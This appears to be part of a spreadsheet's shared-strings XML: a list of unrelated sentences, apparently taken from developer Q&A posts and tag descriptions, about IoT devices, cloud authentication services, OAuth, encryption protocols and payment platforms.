    <t>I am using AWS IoT to allow a secure communication between a self written "Controller" (running with AWSIoTPythonSDK in version 1.4.0 on a raspberry pi, connected by LTE stick) and some AWS lambda funcions (using node with npm package aws-sdk in version 2.411.0).</t>
  </si>
  <si>
    <t>Serial (RS232 or UART I assume) communications don't have a designated transfer protocol (in contrast to USB which has one) to identify a device, so it isn't fail-safe.</t>
  </si>
  <si>
    <t>Knowing that your Arduino already communicates with a third-party server, you can take advantage of it and additionally get the IP address of the Arduino device making the  id registration (in PHP you'd do this by using $_SERVER['REMOTE_ADDR']).</t>
  </si>
  <si>
    <t>That all said and done, it's considerably simpler (and App Store-safe) to use 802.11 -- hopefully your device doesn't mind the extra power draw!</t>
  </si>
  <si>
    <t>Cognito User Pool recently gained support for Facebook and Google identity providers, so you COULD user a User pool trigger if needed.</t>
  </si>
  <si>
    <t>Connection from the gateway to the central is usually done via existing Ethernet/WiFi infrastructures or mobile internet (3G/4G), whatever suits best.</t>
  </si>
  <si>
    <t>That being said, if you serialize the credentials and then deserialize them on boot, the phone app becomes optional, or you could use a service account.</t>
  </si>
  <si>
    <t>So one of this things might help:
Connect your thing policy document to the user identity for the federated pool (not the identity from the user pool).</t>
  </si>
  <si>
    <t>You could look at encrypting the filesystems (e.g: LUKS), but the Raspberry Pi has no native ability to store data and identify itself... so your encryption key can only be something like the MAC address, or stored in cleartext on the SD card...</t>
  </si>
  <si>
    <t>This way, the software on the raspberry will perform REST requests to let the cloud service perform the recognition.</t>
  </si>
  <si>
    <t>SASL is the Simple Authentication and Security Layer, a method for adding authentication support to connection-based protocols.</t>
  </si>
  <si>
    <t>3g-network is short for 3rd generation mobile telecommunications, a generation of standards for mobile phones and other mobile devices.</t>
  </si>
  <si>
    <t>The primary purpose of the protocol is to provide a uniform mechanism for offering X login service independent of any particular host or implementation.</t>
  </si>
  <si>
    <t>Isis2 is a cloud computing library designed to enable reliable and secure replication of data within the cloud.</t>
  </si>
  <si>
    <t>KeePass is a free open source password manager, which helps you to manage your passwords in a secure way.</t>
  </si>
  <si>
    <t>The Google Cloud Console is Google's developer experience for managing and viewing traffic data, authentication, and billing information for the Google APIs that your projects use.</t>
  </si>
  <si>
    <t>Network scanning is a procedure for identifying active hosts on a network or active services on those hosts.</t>
  </si>
  <si>
    <t>Prophet is a risk management platform used by the financial services industry to model companies financial business.</t>
  </si>
  <si>
    <t>adal.js is a new library meant to help you to take advantage of Azure AD to secure your SPA apps and consume Web API from JavaScript.</t>
  </si>
  <si>
    <t>A security service, built on Bluemix, that adds authentication to your apps and protects your back-end resources.</t>
  </si>
  <si>
    <t>Use this tag only for Google Play App Signing online service, not for generic app signing issues.</t>
  </si>
  <si>
    <t>Microsoft Azure Active Directory (Azure AD) will help to add authentication and authorization to your web applications and web APIs.</t>
  </si>
  <si>
    <t>AWS Secrets Manager helps encrypt, store, and retrieve credentials for your databases and other services.</t>
  </si>
  <si>
    <t>The Windows Identity Framework is a free Microsoft library that enables claims based authentication and use federated identity/single sign-on in their applications.</t>
  </si>
  <si>
    <t>PEM, (from Privacy Enhanced Mail standard) is a base64 container format for encoding keys and certificates.</t>
  </si>
  <si>
    <t>This identity contains claim elements, such as email address or username, in a secure package from a trusted source.</t>
  </si>
  <si>
    <t>Internet Protocol Security (IPsec) is a protocol suite for securing IP communications by authenticating and/or encrypting each IP packet of a communication session.</t>
  </si>
  <si>
    <t>Braintree is a payment platform for online and mobile businesses, offering merchants a payment gateway and merchant account.</t>
  </si>
  <si>
    <t>It works well as a personal information manager stored on portable media such as a flash drive.</t>
  </si>
  <si>
    <t>[7] It also includes APIs for contacting arbitrary third party services on the web using a proxy system and OAuth for security.</t>
  </si>
  <si>
    <t>If an app was developed by an unknown developer  one with no Developer ID  Gatekeeper can keep your Mac safe by blocking the app from being installed.</t>
  </si>
  <si>
    <t>By using Tunneling one can (for example) carry a payload over an incompatible delivery-network, or provide a secure path through an untrusted network.</t>
  </si>
  <si>
    <t>Your customers will order on your site, and then pay within 2Checkouts secure PCI compliant payment page.</t>
  </si>
  <si>
    <t>Stream movies, securely store business data, allow users to send large file attachments to each other.</t>
  </si>
  <si>
    <t>Roles are specified by their sets of child users and child roles, all of which are granted any permissions that the parent role has.</t>
  </si>
  <si>
    <t>The technology enables files to be transparently encrypted to protect confidential data from attackers with physical access to the computer.</t>
  </si>
  <si>
    <t>For example, if you use the Google Prediction API to act on behalf of your application without accessing any user data, your application uses its service-account credentials to prove its own identity, and no end user is involved.</t>
  </si>
  <si>
    <t>You obtain these credentials in the Google Developers Console, or if your application uses Google App Engine, a service account is set up automatically.</t>
  </si>
  <si>
    <t>Apple Pay provides an easy and secure way for users to buy physical goods and services in your app.</t>
  </si>
  <si>
    <t>Users can save both username-password credentials and federated identity provider credentials.</t>
  </si>
  <si>
    <t>Authentication (LDAP and Active Directory Authentication Provider)
Federation/SSO (HTTP Header Based Identity Federation)
Authorization (Service Level Authorization)
Auditing
For more information, see https://knox.apache.org/</t>
  </si>
  <si>
    <t>One of the possible solutions is explicit registration of your security provider in the runtime environment, see details here: How to solve java.security.NoSuchProviderException</t>
  </si>
  <si>
    <t>In computer network, Protocols are normally defined in a layered manner and provide all or part of the services specified by a layer of the OSI reference model.</t>
  </si>
  <si>
    <t>Back-end resource protection - The App ID server SDK can be used to protect your back-end resources.</t>
  </si>
  <si>
    <t>The Windows Identity Foundation  is a free Microsoft .NET library that enables claims based authentication and use federated identity/single sign-on in their applications.</t>
  </si>
  <si>
    <t>This can include, but is not limited to: 
interacting with PyPI
uploading to PyPI  
Twine is a utility for securely interacting with PyPI over HTTPS.</t>
  </si>
  <si>
    <t>Technical questions related to any of the Circuit SDKs or APIs, or Circuit OAuth 2.0.</t>
  </si>
  <si>
    <t>Use the Core Telephony framework to obtain information about a users home cellular service providerthat is, the provider with whom the user has an account.</t>
  </si>
  <si>
    <t>A CTCarrier object gives you information about the users cellular service provider, such as whether it allows use of VoIP (Voice over Internet Protocol) on its network.</t>
  </si>
  <si>
    <t>The payment gateway can be offered directly by a bank, or by a Payment Service Provider acting as a mediator between the payee bank and the payer bank.</t>
  </si>
  <si>
    <t>A request/response scheme is present in almost any communication protocol, particularly there message delivery is guaranteed, for example TCP, HTTP, etc.</t>
  </si>
  <si>
    <t>But this seems overly excessive and I'm sure there's some solution or platform out there that exists to solve this - how else do companies like Redbox or Nest for example update firmware on their systems remotely?</t>
  </si>
  <si>
    <t>I created a service account and a key from Google IAM, and gave it Cloud IoT Device Controller permissions, which could update device configurations but not create or delete.</t>
  </si>
  <si>
    <t>Using a Medium trust level prevents applications from accessing shared system resources and eliminates the potential for application interference.</t>
  </si>
  <si>
    <t>The user is directed by the OAuth library to the provider site and must confirm to the provider that they are happy for the requested information to be shared.</t>
  </si>
  <si>
    <t>it authorizes requests to the backend server
it is easily customizable and extensible
This is only a very brief overview of Ember Simple Auth's features.</t>
  </si>
  <si>
    <t>Venice is a simple Ruby gem for verifying Apple In-App Purchase receipts and retrieving the information associated with receipt data.</t>
  </si>
  <si>
    <t>Key enhancements over go-ethereum:
Privacy - Quorum supports private transactions and private contracts through public/private state separation, and utilises peer-to-peer encrypted message exchanges (see Constellation and Tessera) for directed transfer of private data to network participants
Alternative Consensus Mechanisms - with no need for POW/POS in a permissioned network, Quorum instead offers multiple consensus mechanisms that are more appropriate for consortium chains:
Raft-based Consensus - a consensus model for faster blocktimes, transaction finality, and on-demand block creation
Istanbul BFT - a PBFT-inspired consensus algorithm with transaction finality, by AMIS.</t>
  </si>
  <si>
    <t>Instamojo democratizes payments for Indian micro, small &amp; medium enterprises (MSME) by solving 4 biggest entry barriers:
IT/Tech skills required: Our only requirement is a mobile/PC with internet connection.</t>
  </si>
  <si>
    <t>PEM (Privacy Enhanced Mail standard) is a base64 container format that encodes keys and certificates surrounded by header lines, and is used extensively by openssl.</t>
  </si>
  <si>
    <t>Stormpath is the first user management and authentication service for developers.</t>
  </si>
  <si>
    <t>I'm trying to create a new application about facial recognition using the Kinect v1, the raspberry pi 2 and windows iot core, so I did some research and I did find that I can use media capture of the new update windows 10 but what I need to know is, is it possible to use the Kinect v1 with the media capture and if not is there are some other solutions?</t>
  </si>
  <si>
    <t>Atlassian Crowd is a single-sign-on and identity management application.</t>
  </si>
  <si>
    <t>Enterprise-grade identity &amp; mobility management for all your apps, users &amp; devices.</t>
  </si>
  <si>
    <t>Federation-aware applications employ AzMan for access control decisions by mapping federation claims to AzMan roles.</t>
  </si>
  <si>
    <t>However, an application that owns multiple processes or an application that is running in a host process might need to explicitly identify itself so that it can group its otherwise disparate windows under a single taskbar button and control the contents of that application's Jump List.</t>
  </si>
  <si>
    <t>The only way a device could try and spoof an identity would be if someone was able to retrieve these unique id and credentials from a legit device or some other source, reason why we strongly recommend leveraging secure storage solutions on the device to not allow for the device credentials to be stolen and reused.</t>
  </si>
  <si>
    <t>It should use unencrypted protocol
Click Remote Windows Debugger
The operation will take some time
Eventually it will time out (this is ok)
Check to ensure that the application was deployed
If the app wasn't deployed, then you have further problems with your pc's / vs configuration that need to be repaired.</t>
  </si>
  <si>
    <t>Redesigned admin area and front
end - a marketplace module enviroment
Support for CDN, cloud computing and enterprise driven stores with high volume and transaction rate
More payment gateways included in the standard download.</t>
  </si>
  <si>
    <t>Credentials in information systems are widely used to control access to information or other resources.</t>
  </si>
  <si>
    <t>It allows for rapid, yet reliable large-scale
  auditing of multiple hosts.</t>
  </si>
  <si>
    <t>Balanced provides online marketplace payments via a RESTful HTTP API with libraries in a range of languages including Python, Ruby, and PHP as well as a PCI compliant library,  balanced.js which is used to tokenize credit cards and bank accounts.</t>
  </si>
  <si>
    <t>Using these APIs, apps can query databases, store data, upload files, send emails, create push notifications, register users, and perform other actions provided by data sources and services.</t>
  </si>
  <si>
    <t>Authorization of read / write operations by clients
Authorization is pluggable and integration with external authorization services is supported
Links
Apache Kafka Security Documentation
Related Tags
apache-kafka
apache-kafka-connect
apache-kafka-streams
confluent-kafka
confluent
kafka-consumer-api
kafka-producer-api</t>
  </si>
  <si>
    <t>It could also be used for a one time conversion of a userbase from Twitter credentials to Twitter OAuth access tokens.</t>
  </si>
  <si>
    <t>A virtual private cloud (VPC) is a virtual network dedicated to your AWS account.</t>
  </si>
  <si>
    <t>Having multiple files all sharing the same namespace seems almost pointless, because all you that seems to be happening is unintentional obfuscation of program flow.</t>
  </si>
  <si>
    <t>For backend servers to interact with IoT-Core, the authentication method is not the same as for device MQTT or HTTP connections.</t>
  </si>
  <si>
    <t>Cloudflare is a content delivery network Domain Name Server service aimed at enhancing website performance and speed and providing security.</t>
  </si>
  <si>
    <t>The ideia behind what I read is that if I have a web server available for use (i will be using my company's for testing, they won't mind) I can ssh to it from the pi and then ssh to it from my computer, and after ssh'ing to the server, I can control the pi via a secure shell.</t>
  </si>
  <si>
    <t>My questions are: 
in the process of device registration, is that both the device and the platform are client of the MQTT broker, doesn't the WIoT platform also acts as the broker?</t>
  </si>
  <si>
    <t>Tink is a multi-language, cross-platform library that provides a simple and misuse-proof API for common cryptographic tasks.</t>
  </si>
  <si>
    <t>Also included are 25+ apps including wordpress, Drupal, Joomla and Magento e-commerce along with free lets-encrypt certificates, multi-factor authentication, and Whois privacy.</t>
  </si>
  <si>
    <t>I'm not intimately familiar with how the WebRTC API interacts with the native layer, but you may need additional permissions for the call to succeed.</t>
  </si>
  <si>
    <t>Crafted using base code from django-social-auth, implements a common
  interface to define new authentication providers from third parties.</t>
  </si>
  <si>
    <t>I am using app credentials (api key and token) which has "Operations application" role and hence privileges to assign roles.</t>
  </si>
  <si>
    <t>In my project, my device will transfer raw data to a cloud and then the cloud will send information decrypted in JSON format to AWS IoT.</t>
  </si>
  <si>
    <t>From the docs:
PSCP, the PuTTY Secure Copy client, is a tool for transferring files
  securely between computers using an SSH connection.</t>
  </si>
  <si>
    <t>There are a variety of ways to do this,  such as dynamic dns registration, or you could have it phone home to some sort of locator service that your app could then query, etc...</t>
  </si>
  <si>
    <t>The second possibility would be that you give partners your secondary key and you use your primary if one of your partners would abuse the key you could replace it without having downtime in your own services.</t>
  </si>
  <si>
    <t>I have found this clarifying resource:
https://blogs.msdn.microsoft.com/kwill/2015/02/16/azure-cloud-services-only-support-sha-1-thumbprint-algorithm/
It points the key difference between signing algorithm and thumbprint algorithm.</t>
  </si>
  <si>
    <t>Here is a call structure of DPS device registration:
Your device can either register itself through edge module or edge module can register device if you are using protocol translation.</t>
  </si>
  <si>
    <t>These components improve the quality, reliability, and consistency of the user experience for customers who have fingerprint biometric devices.</t>
  </si>
  <si>
    <t>A hotspot is a location that offers Internet access over a wireless local area network through the use of a router connected to a link to an Internet service provider.</t>
  </si>
  <si>
    <t>This includes Wi-fi, Bluetooth, Mobile phones, GPS, Radar, some remote control devices and near field communication devices (NFC) such as contactless smartcards.</t>
  </si>
  <si>
    <t>Using the Social Framework you can create requests for social information for the current user, or post to their accounts.</t>
  </si>
  <si>
    <t>Refers to Version 2.0 of the Secure Sockets Layer (SSL) protocol, this is used for securely transmitting encrypted data across the web.</t>
  </si>
  <si>
    <t>The Apache WSS4J is a Java implementation of the primary security standards for Web Services, namely the OASIS Web Services Security (WS-Security) specifications from the OASIS Web Services Security TC.</t>
  </si>
  <si>
    <t>The System for Cross-domain Identity Management (SCIM) specification is designed to make managing user identities in cloud-based applications and services easier.</t>
  </si>
  <si>
    <t>SimpleAuthentication is an `ASP.NET` library that makes it really simple to for developers to add Social Authentication code to an ASP.NET application.</t>
  </si>
  <si>
    <t>The AWS Security Token Service, or AWS STS for short, lets you grant a trusted user temporary, limited access to your Amazon Web Services (AWS) resources.</t>
  </si>
  <si>
    <t>MobileFirst Studio (formerly Worklight Studio) is an Eclipse-based IDE, allowing to develop, test, manage, and secure mobile applications.</t>
  </si>
  <si>
    <t>Identity tools from Google help you quickly build an auth system that will grow with your business and reduce the friction of getting users into your app.</t>
  </si>
  <si>
    <t>OAuth is an open authorization framework, which can be used to authenticate a user against an OAuth provider on third party websites without exposing the credentials to the third party</t>
  </si>
  <si>
    <t>Stripe.js is Stripe's foundational JavaScript library for securely sending sensitive information to Stripe directly from the customer's browser.</t>
  </si>
  <si>
    <t>The SCIM 2.0 specifications designed to make managing user identities in cloud-based applications and services easier.</t>
  </si>
  <si>
    <t>The Windows Process Activation Service (WAS) manages the activation and lifetime of the worker processes that contain applications that host WCF services.</t>
  </si>
  <si>
    <t>Home automation may include centralized control of lighting, HVAC (heating, ventilation and air conditioning), appliances, and other systems, to provide improved convenience, comfort, energy efficiency and security.</t>
  </si>
  <si>
    <t>2-Legged oauth is a mechanism for third party applications, mostly mobile and desktop clients, of getting user protected resource by getting access token in exchange of user and password.</t>
  </si>
  <si>
    <t>It's a fully managed, multiregion, multimaster database with built-in security, backup and restore, and in-memory caching for internet-scale applications.</t>
  </si>
  <si>
    <t>NSi AutoStore (http://www.nsiautostore.com/autostore/) is a server-based application which provides solutions for the capture and secure delivery of paper and electronic documents into business applications.</t>
  </si>
  <si>
    <t>SSLv2 refers to Version 2.0 of the Secure Sockets Layer (SSL) protocol, this is used for securely transmitting encrypted data across the web.</t>
  </si>
  <si>
    <t>With it, you can remotely execute programs, transfer files, or use a secure and transparent tunnel for your remote programs.</t>
  </si>
  <si>
    <t>Spring Security is a popular, highly customizable authentication and authorization framework for Java/Java EE and is a de-facto standard for securing Spring-based applications.</t>
  </si>
  <si>
    <t>By using Springs HessianProxyFactoryBean and the HessianServiceExporter you can transparently expose your services using the lightweight binary HTTP-based protocol provided by Caucho.</t>
  </si>
  <si>
    <t>The standards-based specification incorporates widely accepted Internet transport and security protocols.</t>
  </si>
  <si>
    <t>This helps avoid all the comments: "you could do that but that way your app will never be approved..."
Tag non-app-store is not ment as a synonym to jailbrake or private-API.</t>
  </si>
  <si>
    <t>https://github.com/SimpleAuthentication/SimpleAuthentication
--
SimpleAuthentication is a ASP.NET library that makes it really simple to for developers to add Social Authentication code to an ASP.NET application.</t>
  </si>
  <si>
    <t>SockJS-client is intended to work for all modern browsers and in environments which don't support WebSocket protocol, for example behind restrictive corporate proxies.</t>
  </si>
  <si>
    <t>Because &lt;cfform&gt; functionality is tied in with a specific version of ColdFusion, many developers prefer using other technologies for client side data validation.</t>
  </si>
  <si>
    <t>APIs for simplifying In-App Purchases to a single line of code including increased security and event handling.</t>
  </si>
  <si>
    <t>APIs for simplifying In-App Purchases to a single line of code
including increased security and event handling.</t>
  </si>
  <si>
    <t>MongoDB grants access to data and commands through role-based authorization and provides built-in roles that provide the different levels of access commonly needed in a database system.</t>
  </si>
  <si>
    <t>Control Access to AWS Resources
You can use the unique user identifiers that Amazon Cognito generates in your access policies to enable or restrict access to other AWS resources on a per-user basis.</t>
  </si>
  <si>
    <t>You can then use built.io as your datastore, rely on it for your data validation and security needs, upload files, push notificationsin short, you can do everything that you used to rely on a backend for.</t>
  </si>
  <si>
    <t>Java security technology provides the developer with a comprehensive security framework for writing applications, and also provides the user or administrator with a set of tools to securely manage applications.</t>
  </si>
  <si>
    <t>Thanks to their reliability and low cost, those cards are widely used for electronic wallet, access control, corporate ID cards, transportation or stadium ticketing.</t>
  </si>
  <si>
    <t>OneLogin provides open-source toolkits and guidance that help developers quickly and securely support SAML web SSO, NAPPS native app SSO, and SCIM user provisioning in their apps.</t>
  </si>
  <si>
    <t>Enables secure transmission of documents and messages between partners using disparate internal business systems.</t>
  </si>
  <si>
    <t>When you upgrade a Backup vault to a Recovery Services vault, the backup data remains intact during and after the upgrade process.</t>
  </si>
  <si>
    <t>Today, the Identity Experience Framework is available only in the context of the Azure AD B2C service and prioritized for tasks related to CIAM.</t>
  </si>
  <si>
    <t>OMG is a fully public, currency agnostic decentralized exchange (DEX) network which will be secured by Ethereum and built to scale infinitely using the Plasma architecture.</t>
  </si>
  <si>
    <t>ExpressRoute is a service that enables you to create private connections between Azure datacenters and infrastructure that's on your premises or in a colocation environment.</t>
  </si>
  <si>
    <t>'Secure Sockets Layer' was originally a comp.sources Usenet post in the 1980s, using a fairly primitive security protocol.</t>
  </si>
  <si>
    <t>It makes developers write code in Java and it compiles into JavaScript specifically made and optimized for each browser, providing cross-browser compatibility and security and raising developer productivity.</t>
  </si>
  <si>
    <t>@Embeddable is an annotation used in java to suggest that a class is stored as an intrinsic part of an owning entity and share the identity of the entity.</t>
  </si>
  <si>
    <t>The Windows Identity Framework is a free Microsoft .NET library that enables claims based authentication and use federated identity / single sign-on in their applications.</t>
  </si>
  <si>
    <t>You can utilize PublisherCacheFolder:
The strong security model of Windows Runtime app typically prevents
  apps from sharing data among themselves.</t>
  </si>
  <si>
    <t>Configuration Manager provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory.</t>
  </si>
  <si>
    <t>Pretty Good Privacy (PGP) is a data encryption and decryption computer program that provides cryptographic privacy and authentication for data communication.</t>
  </si>
  <si>
    <t>Network file system is implemented in a client/server computing model, where an NFS sever manages the authentication, authorization and management of clients, as well as all the data shared within a specific file system.</t>
  </si>
  <si>
    <t>Founded in 1999, GlobalPlatform is a cross-industry, non-profit association that creates and publishes specifications aiming at standardizing deployment and management of multiple embedded applications on secure chip technology (such as smartcard chips, secure elements, trusted execution environments, etc).</t>
  </si>
  <si>
    <t>Service Bus Queues, introduced with the latest release of the Service Bus, are built on top of the broader "brokered messaging" infrastructure designed to integrate applications or application components that may span multiple communication protocols, data contracts, trust domains, and/or network environments.</t>
  </si>
  <si>
    <t>It is designed to be a more secure version of ZeroMemory.This function is a more secure version of the Platform SDK memory management function ZeroMemory</t>
  </si>
  <si>
    <t>For these kind of apps the developer can chose to ignore many rules set by Apple and also use private APIs if this is required for the apps functionality.</t>
  </si>
  <si>
    <t>Major disadvantage with cloud hosting: Security
Questions like these arise when it comes to cloud hosting:
I am sharing the same physical hardware with other users, is my data safe?</t>
  </si>
  <si>
    <t>Microsoft Enterprise Library is a collection of application blocks and core infrastructure designed to assist developers with common enterprise development challenges such as logging, validation, data access, etc.</t>
  </si>
  <si>
    <t>For security and reliability reasons most modern operating systems prevent direct communication between independent processes, providing strictly mediated and controlled inter-process communication functionality.</t>
  </si>
  <si>
    <t>Check out this tutorial on gateways to get an idea of what we're talking about:
https://cloud.google.com/community/tutorials/cloud-iot-gateways-rpi
TL;DR version is that it allows a single device to manage many smaller devices (which may not be capable of auth on their own) but still have those smaller devices be represented in the Cloud.</t>
  </si>
  <si>
    <t>SAML 2.0 enables web-based authentication and authorization scenarios including cross-domain single sign-on (SSO), which helps reduce the administrative overhead of distributing multiple authentication tokens to the user.</t>
  </si>
  <si>
    <t>Usercake is a simple and secure user management system written in PHP.</t>
  </si>
  <si>
    <t>Each user is provisioned multiple accounts across multiple systems.</t>
  </si>
  <si>
    <t>For reliable communications, you need to include some protocol with your binary data, so that 
you know when things have gone wrong
you can get back in sync
A detailed description of serial framing can be found here
As an example, the point-to-point protocol (PPP) provides a simple method of framing sections of data by surrounding them with a special character which is guaranteed never to occur on it's own in the binary stream (there is an escaping mechanism to allow this to happen).</t>
  </si>
  <si>
    <t>Check that you have enabled billing for your project
If you are deploying your Google Cloud Functions with  ... from the folder with your .js and package.json files, you may want to set the environment variables (GCLOUD_PROJECT and GOOGLE_APPLICATION_CREDENTIALS) or use gcloud auth application-default login before deploying in case you have multiple Google Cloud projects and need to enable the API on the configured one.</t>
  </si>
  <si>
    <t>Trusted computing is a technology to enhance security of computer systems.</t>
  </si>
  <si>
    <t>OpenAM is an open source access management, entitlements and federation server platform.</t>
  </si>
  <si>
    <t>However if you want to work with device Twins from the backend perspective (as in using a backend app that sets desired properties for devices, reads devices reported properties and work with tags) then you need to use a SAS Token generated from one of the IoT Hub shared access policies name/key (not Device credentials).</t>
  </si>
  <si>
    <t>Here's what I thought worked, but it didn't
*
Its missing from the tutorial, but you need to manually create a new
  service bus endpoint (see
  https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-dotnet-get-started-with-queues)
  and copy the  from the
  RootManageSharedAccessKey policy of Shared Access Policies.</t>
  </si>
  <si>
    <t>Currently, AutoMapper is geared towards model projection scenarios to flatten complex object models to DTOs and other simple objects, whose design is better suited for serialization, communication, messaging, or simply an anti-corruption layer between the domain and application layer.</t>
  </si>
  <si>
    <t>Android DRM framework offers an abstract, unified API that simplifies the management of rights-protected content.</t>
  </si>
  <si>
    <t>The extension is offloading work from the Nagios core to make it scale better, allowing more systems to be monitored from a single Nagios server.</t>
  </si>
  <si>
    <t>OpenShift integrates with the Git version control system to provide powerful, decentralized version control for your application source code.</t>
  </si>
  <si>
    <t>Supports multiple protocols (also called standards) for electronic commerce, such as , RosettaNet &amp; SOAP.</t>
  </si>
  <si>
    <t>Integrates the  in the Sonata Admin Project and adds some features:
AdminBundle: add user and group management
EasyExtends: allows to generate Application level model
Features: User profile dashboard, user profile menu, Google Authenticator support (optional), 
The roles to be assigned to users are splitted in 2 parts:
editable: the roles the current user is allowed to assign to other users
(permission or role MASTER)
readonly: the roles assigned to the current user, however the current
user is only allowed to see them
When using ACL, the UserBundle prevents normal user to change settings of super-admin users.</t>
  </si>
  <si>
    <t>[mysqld_safe]
socket          = /var/run/mysqld/mysqld.sock
nice            = 0
[mysqld]
#
# * Basic Settings
#
user            = mysql
pid-file        = /var/run/mysqld/mysqld.pid
socket          = /var/run/mysqld/mysqld.sock #ORIGINAL
#socket          = /media/my_flashdrive/mysqldb/mysqld.sock #ADDED
port            = 3306
basedir         = /usr
datadir         = /var/lib/mysql #ORIGINAL
#datadir         = /media/my_flashdrive/mysqldb #ADDED
tmpdir          = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
#
# Instead of skip-networking the default is now to listen only on
# localhost which is more compatible and is not less secure.</t>
  </si>
  <si>
    <t>Please check your username/password {org.wso2.carbon.apimgt.rest.api.util.interceptors.auth.BasicAuthenticationInterceptor}
  TID: [-1] [] [2017-07-25 09:20:32,071] ERROR
  {org.wso2.carbon.apimgt.webapp.publisher.APIPublisherStartupHandler} -
  failed to publish api.</t>
  </si>
  <si>
    <t>SubInACL is a Microsoft Windows command line tool used used by administrators to manage security settings on files, registry keys, and services.</t>
  </si>
  <si>
    <t>Stripe Elements: A set of adaptive UI components to build secure, pixel-perfect checkouts across desktop and mobile.</t>
  </si>
  <si>
    <t>If a device has a managed profile for work, the profile's settings are under the control of the enterprise administrator.</t>
  </si>
  <si>
    <t>Authentication
Use OAuth connection standards to connect to third-party services and build your integrations with enterprise security standards.</t>
  </si>
  <si>
    <t>The only way I think this may be achieved is by looking at:
how the Web API for Authentication performs authentication, then make your own REST calls from your app to retrieve access token (please be aware you also need to refresh the token when it expires)
how the Web API for Storage performs requests on the network, so you can mimic the behaviour, which will have to be reimplemented with some REST library
Have a read here to know what you can actually do with and without Play Services.</t>
  </si>
  <si>
    <t>Some Android NFC devices have an embedded secure element (or can be used with a UICC-based secure element) that is capable of emulating MIFARE Classic.</t>
  </si>
  <si>
    <t>IoT Meets Blockchain...
Blockchain and Internet Of Things (IoT) are easily the two biggest buzzwords in technology at the moment.</t>
  </si>
  <si>
    <t>The biggest advantage of Ansible over technologies like Puppet is that it is agent-less, i.e., no clients need to be installed, which avoids the chicken and egg problem.</t>
  </si>
  <si>
    <t>It also can be used as a transparent proxy with and without media in the path to act as a SBC (session border controller) and proxy T.38 and other end to end protocols.</t>
  </si>
  <si>
    <t>Test3: When connecting using Nexus 4 sample app, (which is unstable), it asking for authorization on both device.Even after I can get rid off the authorization, the hcidump look like they are exchanging SDP info, the service list still not come up on Android sample app.</t>
  </si>
  <si>
    <t>Normally, especially in today's code-signed MacOS app approach (where any modifications to the app or its resources/files would break the app &amp; make it not-launchable), I would say "you're out of luck".</t>
  </si>
  <si>
    <t>The role of course needs to have the IoT service in it's trust policy (also know as the assume role policy document in some places).</t>
  </si>
  <si>
    <t>The Microsoft Bot Framework is used for building intelligent chat bots and deploying them to multiple messaging platforms or channels at once.</t>
  </si>
  <si>
    <t>Organizations simplify management of group-owned repositories (for example: your company's code), expand on our permissions system, and help focus your GitHub workflow for business and large open source projects.</t>
  </si>
  <si>
    <t>Add custom extensions to an application, to leverage platform
features not exposed by Crosswalk or the standardized web platform.</t>
  </si>
  <si>
    <t>By using this service, business customers can discover incidents and establish a logic flow for root cause analysis.</t>
  </si>
  <si>
    <t>A successful authentication flow results in your application obtaining
  a user access token which can be used to make requests to Facebook's
  APIs.</t>
  </si>
  <si>
    <t>Finally you should arrive at the following page offering the option to get the insider preview OS and sign up with an MSDN account etc...
https://developer.microsoft.com/en-us/windows/iot/win10/GetStarted/rpi3/sdcard/insider/getstartedstep2
If you then want to know how best to control your Pi 3 running Windows IoT Core check out this blog post: http://www.purplefrogsystems.com/paul/2016/06/controlling-your-windows-10-iot-core-device/</t>
  </si>
  <si>
    <t>I am not convinced with the proposed solutions so is there a possible way to use GCM or any similar system like Parse in Arduino and make it have a unique registration ID just like android then I can map the user's Android registeration ID with the related Arduino registration ID.</t>
  </si>
  <si>
    <t>The ONVIF client may as well send some authorization headers, but you might for start just as well ignore them and implement authorization when the actual streaming is running.</t>
  </si>
  <si>
    <t>When the Peripheral
  Privacy Flag characteristic is set to 1, privacy is enabled (also
  known as privacy enabled Peripheral).</t>
  </si>
  <si>
    <t>Add appropriate permissions to the .service file: sudo chmod 644 /lib/systemd/system/hello.service 
Reload the systemd daemon: sudo systemctl daemon-reload
Enable the hello systemd service: sudo systemctl enable hello.service
You can check that your service is running by using the command: sudo systemctl status hello.service and check for any errors using sudo journalctl</t>
  </si>
  <si>
    <t>You send a request to a social networking service to perform some operation on behalf of the user or to retrieve user information.</t>
  </si>
  <si>
    <t>TLS extension which allows the application layer to negotiate which protocol should be performed over a secure connection in a manner which avoids additional round trips</t>
  </si>
  <si>
    <t>The Lifelog API is a REST-based web-service API in which you use endpoints like User profile, Activities and Locations to get secure access to Lifelog data for a user.</t>
  </si>
  <si>
    <t>strongSwan is a complete implementation of the IPSec protocol suite for securing IP communications by authenticating and/or encrypting each IP packet of a communication session.</t>
  </si>
  <si>
    <t>Vault is a commercial, proprietary revision control system by SourceGear LLC which markets its product as a replacement for Microsoft's Visual Source Safe.</t>
  </si>
  <si>
    <t>OAuth 2.0 is a specification for open authorization that simplifies some of the concepts of its predecessor, OAuth 1.0, and supports additional use cases beyond the web browser.</t>
  </si>
  <si>
    <t>In information theory and coding theory, error correction  is a technique that enable reliable delivery of digital data over unreliable communication channels.</t>
  </si>
  <si>
    <t>IBM MobileFirst Quality Assurance features:
User feedback and sentiment analysis delivers user input from within the app and mined from public app stores.</t>
  </si>
  <si>
    <t>IBM Bluemix App ID, formerly Mobile Client Access, enables you to add a level of security by requiring users to sign in to your mobile and web apps.</t>
  </si>
  <si>
    <t>Dat Project is a not-for-profit organization that creates specifications and protocols for creating decentralized P2P applications over the internet, as well as provides an ecosystem of (browser- and NodeJS-based) modules that implement them.</t>
  </si>
  <si>
    <t>Hono specifically supports scalable and secure ingestion of large volumes of sensor data by means of its Telemetry and Event APIs.</t>
  </si>
  <si>
    <t>This feature, enabled by default, reduces the privilege level of an Administrator account to those of Limited User account.</t>
  </si>
  <si>
    <t>Claims based authentication is the process of authenticating a user based on a set of claims about its identity contained in a trusted token.</t>
  </si>
  <si>
    <t>It performs platform measurements that an operating system can use to ensure platform integrity, thus implementing a form of secure boot.</t>
  </si>
  <si>
    <t>The problem is that it only works within the app, if I open Google Music and I simulate increase volume the app close due to INJECT_EVENTS Permissions.</t>
  </si>
  <si>
    <t>When I deploy the stack, I receive the following message and the services do not get deployed: "Ignoring unsupported options: privileged".</t>
  </si>
  <si>
    <t>With the system bus you won't need to set the address even when connecting over SSH (but you may need to make sure the service policy allows the app user to send messages to the service).</t>
  </si>
  <si>
    <t>In other word, the device twin is not designed for storing a real-time device telemetry data in the cloud backend.</t>
  </si>
